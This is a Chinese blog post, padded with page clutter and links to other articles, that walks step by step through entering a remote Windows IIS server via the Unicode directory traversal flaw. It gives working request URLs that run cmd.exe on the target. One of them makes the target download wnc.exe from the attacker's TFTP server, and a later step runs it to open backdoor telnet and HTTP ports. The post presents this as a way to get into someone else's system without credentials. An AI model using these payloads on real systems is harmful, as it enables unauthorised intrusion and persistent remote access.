不用用户名登陆对方系统

最新推荐文章于 2023-06-21 14:51:03 发布

原创最新推荐文章于 2023-06-21 14:51:03 发布 · 1.7k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#iis #浏览器 #工具 #c

原理：利用Unicode漏洞登陆对方主机，

试验结果：开放对方707（telnet）端口，808（http）端口

试验工具：

1. X-Scan-v3.3（扫描IIS漏洞）

2. tftpd32.exe（上传wnc.exe）

3. wnc.exe（开放端口）

试验过程：

1.利用X-Scan-v3.3扫描IIS漏洞，结果如图

2.利用漏洞，在浏览器中输入：

http://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/ 可显示目标主机C盘的目录。

3.打开tftpd32.exe，建立tftp服务器（本机）。

拷贝wnc.exe到tftp32所在的文件夹，http://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+wnc.exe 即把wnc.exe拷贝到Scripts文件夹下。

5.远程执行wnc.exe。

http://172.18.25.109/scripts/wnc.exe?/c 即开放707（telnet）端口，808（http）端口

6.进入对方主机了

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

jier

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
4
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【系统架构设计师】论文：论信息系统的安全性与保密性设计

数据知道的博客

08-30

8234

我所在公司承接了一款养老管理信息平台，该系统以养老为主线，其中包括养老档案、照护计划、服务审计、状况跟踪、费用管理等方面的60多个业务功能模块，我在项目中担任系统架构设计师，主要负责整个系统的架构设计。本文以该养老管理信息平台为例，主要论述了针对该系统的安全及保密性问题，我们所采用的技术手段及解决方案。在网络硬件层通过设置硬件防火墙，来保证内部网络安全性；在数据层通过设置数据加密及容灾备份机制，以此保证数据抗突发风险的安全；

Web渗透攻击实战（2）—获取网站后台登录用户名密码

请大家直接把问题写在评论区或留言，不要只说一句"你好或在吗"，我会尽快回复的。

09-11

1万+

接上一篇内容：渗透攻击实战（1）—成功渗透台湾某净化设备公司官网写在前面作为一个防御型白帽黑客你一定要知道黑客的进攻套路才能有相应的防御措施声明：只做测试，发现对方的漏洞，并不进行破坏性操作信息汇总漏洞汇总： 1、存在SQL注入漏洞2、SQL注入查询长度为9个字段,即 union select 1,2,3,4,5,6,7,8,93、网站无错误回显，SQL执行错误显示空白页面数据库信息： 1、数据库版本：mysql 5...

4 条评论您还未登录，请先登录后发表或查看评论

wnc.rar软件下载

03-03

本文件包含软件安装包以及安装操作详细说明书，操作简单，安装方便，软件轻巧，需要的同志可以自行下载！

网安--第六章网络后门与网络隐身

lishirong_李世荣的专栏

12-02

3679

第六章网络后门与网络隐身内容提要为了保持对已经入侵的主机长久的控制，需要在主机上建立网络后门，以后可以直接通过后门入侵系统。当入侵主机以后，通常入侵者的信息就被记录在主机的日志中，比如IP地址、入侵的时间以及做了哪些破坏活动等等为了入侵的痕迹被发现，需要隐藏或者清除入侵的痕迹实现隐身有两种方法：设置代理跳板清除系统日志。网络后门网络后门是保持对目标主机长久控制的关键策略。可以通过

windows环境下nc(netcat)的安装及使用

热门推荐

浅沫

03-29

10万+

一、下载 url：https://eternallybored.org/misc/netcat/ 我下载下来360会拦截，说是有木马，我没有理会，下载考出nc.exe后将文件就删了打开下载的压缩包，找到nc.exe,复制粘贴到 c盘 users/当前登录用户目录下即可（简单粗暴的方式，也可以自己配置环境变量）二、测试打开命令界面 cmd 输入nc命令即可我是在...

Windows下的Tftpd32(Tftpd64)软件下载和使用教程-集成了Tftp服务器、客户端

wkd_007的博客

02-14

8万+

是一个免费、轻量级、开源的、适用于IPv6的32位应用程序，集成了DHCP、TFTP、SNTP和Syslog多种服务，支持tsize, Blocksize 与 Timeout等软件的在线操作，在传输数据时可实现最大性能。如果下载的是普通安装版本，可以按照安装向导一步一步安装即可，因为这个软件还不到1M大小，我直接下载免安装版本。免安装版本下载后，直接双击运行即可。字样，但官网现有只有英文版，如果需要中文版本，可以下载这个。下载，官网提供了普通版本和免安装版本，免安装版本带有。二、Tftp32下载、安装。

两个系统跳转实现免登录

m0_61289694的博客

05-09

5126

两个系统跳转实现免登录

不用用户名登陆对方系统.doc

07-08

标题中的“不用用户名登录对方系统”意味着我们将探讨一种绕过传统用户名和密码验证的方法，而描述提到了通过利用Unicode漏洞来实现这一目标。这通常涉及到网络渗透测试或安全漏洞利用，而不是常规的合法访问手段。 ...

基于SpringCloud微服务车辆管理系统

06-21

977

本设计采用了基于SpringCloud，微服务技术架构以及各种中间件来实现车辆管理系统，主要完成了车辆信息管理，驾驶员管理，车辆运维管理，角色管理，部门管理，系统管理，系统监控等模块，实现了更好的车辆状态的相关管理，让企业服务更加方便快捷。

基于阿里云的一般性系统安全措施介绍

shiter编写程序的艺术

09-06

1648

文章大纲1. 基于阿里云的典型生产环境安全架构简介1.1 网络安全1.2 主机安全1.3数据库安全1.4应用安全1.5日志2. 源代码管理2.1源代码安全性保障2.2源代码的授权访问2.3源代码的复制和传播2.4源代码平台日常管理3. 堡垒机访问控制3.1概述3.2权限控制3.3堡垒机的授权访问4. RDS数据库访问控制4.1概述4.2RDS数据账号权限控制4.3白名单5. 数据备份\恢复5.1备份系统日常管理5.2日常巡检管理6. ACM应用配置管理6.1目的6.2ACM作用6.3ACM管理维护7. 应用

两个系统跳转实现免登录(单点登录)

书中自有妍如玉的博客

09-07

1万+

2.点击跳转，拿着用户名+token重定向到B站，B站在全局路由守卫beforEach判断to.query.token和to.query.userName是否为空，不为空则代码从别的的系统跳转过来的，调用免密登录（用户名+token）获取用户权限数据信息。B站持久化储存或Vuex储存。1.A站登录后，拿着A站账号名获取B站的token，同时在B站保存改账号的信息（用户名+token+过期时间）定义：多个系统之间在某个系统登陆一次即可访问所有系统。假设A站登录，跳转B站无需登录。3.B站跳转A站同上。

Windows与嵌入式linux设备数据传送工具——tftpd32软件使用说明

C/C++攻城狮

06-13

4572

0x00 前言文章中的文字可能存在语法错误以及标点错误，请谅解；如果在文章中发现代码错误或其它问题请告知，感谢！ 0x01 TFTP协议简介 TFTP（Trivial File Transfer Protocol,简单文件传输协议）是TCP/IP协议族中的一个用来在客户端与服务器之间进行简单文件传输的协议，具体使用的是UDP协议，TFTP服务器通信端口为69。该协议适用于在局域网内传送文件，并...

wireshark 抓取telnet登录用户名和密码

ethncitybeta的专栏

04-25

4780

平台CentOS（linux）+ODS（win7）+wireshark 1、在linux主机上建立测试用户 用户名：ethnicitybeta 用户密码：laji123 [root@localhost ~]# useradd ethnicitybeta [root@localhost ~]# passwd ethnicitybeta 2、在DOS端通过TELNET登录linux主机(此时已经打开wireshark软件) C:/

360路由器v2刷第三方固件_不走弯路：小米路由器3G 刷Padavan固件简单教程

weixin_39601511的博客

10-26

3379

前言-序：文件内容大部分来在网络，网上也有很多类似的教程，而我在刷R3G过程中遇到了很多问题，经过不段的尝试，整理出一篇能少走弯路的刷机教程，希望能帮到你。PS：因为已经刷完机了，图片很少，可参考其它教程的图片。小米路由器3G参数：(简称R3G)处理器：MT7621A MIPS双核880MHzROM：128MB SLC Nand Flash内存：256MB DDR3-12002.4G WiFi：2...

若依（RuoYi）系统实现免登录访问

whq1576049813的博客

03-05

1万+

**1.**找到ruoyi-framework/src/main/java/com/ruoyi/framework/config/ShiroConfig.java文件在如图位置添加要放开权限的路径 **2.**在控制层注释掉如图注释部分即可 **3.**若前端页面出现部分按钮组件丢失问题，请去掉对应按钮组件里的shiro:hasPermission即可如图去掉shiro:hasPermission="system:fileinfo:add"即可 ...

telnet 远程登录脚本（免用户名和面膜手动输入）

shuzui1985的专栏

12-02

2135

介绍Xp上的脚本，linux的各位看管自己琢磨。建立一个telnet.vbs脚本文件： set sh=WScript.CreateObject("WScript.Shell") WScript.Sleep 1000 sh.SendKeys "c:{ENTER}" WScript.Sleep 1000 sh.SendKeys "cd C:\Documents and S

用户免登录功能

lffxsx的博客

09-29

8470

思路：用户免登陆的是指用户登录时，输入用户名、密码等等，再勾"记住密码"选项，’成功登录过一次系统，而用户的用户名以及密码等等都保存在cookie中，当用户再次登录时，系统会自动调用Cookie中的数据，自动给用户赋值，从而实现免登陆。下面是实现本次功能的代码： login.jsp: Insert title here String uname="";

openssh 7.8 用户名美剧

最新发布

01-09

### OpenSSH 7.8 用户名配置和常见问题对于OpenSSH 7.8版本，在处理用户名相关的问题时，通常涉及几个方面：用户认证方式、权限设置以及特定环境下的配置调整。 #### 配置文件解析主要的配置位于`/etc/ssh/sshd_config` 文件内。此文件控制着服务器端的行为模式，包括但不限于允许哪些用户通过SSH连接到主机。如果遇到用户名相关的访问障碍，应检查如下几项配置： - `PermitRootLogin`: 控制是否允许root账户直接登录，默认建议设为no以增强安全性[^4]。 - `AllowUsers` 或 `DenyUsers`: 明确指定可以或不可以使用SSH服务的具体账号列表。这有助于精细化管理谁能够远程接入系统。 - `PasswordAuthentication`: 开启或关闭基于口令的身份验证机制。考虑到安全因素，推荐采用更高级别的认证手段如公钥加密。当发现某些合法注册过的用户无法正常登陆时，除了上述全局设定外，还需关注用户的家目录及其`.ssh`子目录下授权密钥文件(`authorized_keys`)的状态。任何不恰当的操作都可能导致鉴权失败。另外值得注意的是，SFTP会话中的路径映射也可能引发类似的困扰。比如，若将某个用户的基底位置限定在一个受限区域内，则需确保该区域由适当的角色所拥有并赋予必要的读写许可。例如命令`chown root:sftp /data/sftp`就是用来修正这种情况的一个实例[^3]。 #### 常见错误排查指南针对具体场景中可能出现的异常情况，这里列举了一些典型的症状及对应的解决方案： - **提示“Permission denied (publickey,password)”** 这通常是由于客户端提交给服务器的信息未能满足后者的要求所致。可能是私钥丢失、损坏或是未正确加载；也有可能是因为目标机器上的公共密钥记录有误。此时应当重新生成一对新的秘钥对，并按照标准流程完成部署。 - **显示“Connection closed by remote host”** 此类现象往往暗示存在防火墙规则阻止了正常的通信过程，或者是远端的服务进程本身处于不稳定状态。尝试临时放宽网络策略来排除干扰源；同时确认sshd守护程序正在运行且监听预期端口号(默认22)。 - **遭遇“Host key verification failed.”警告** 当首次建立联系或者对方更换过身份凭证之后便会出现这样的提醒。解决办法是在本地删除已有的缓存条目（一般保存于~/.ssh/known_hosts），随后再次发起请求即可自动更新最新的指纹数据。 ```bash # 清除旧版host keys记录 ssh-keygen -R hostname_or_ip_address ```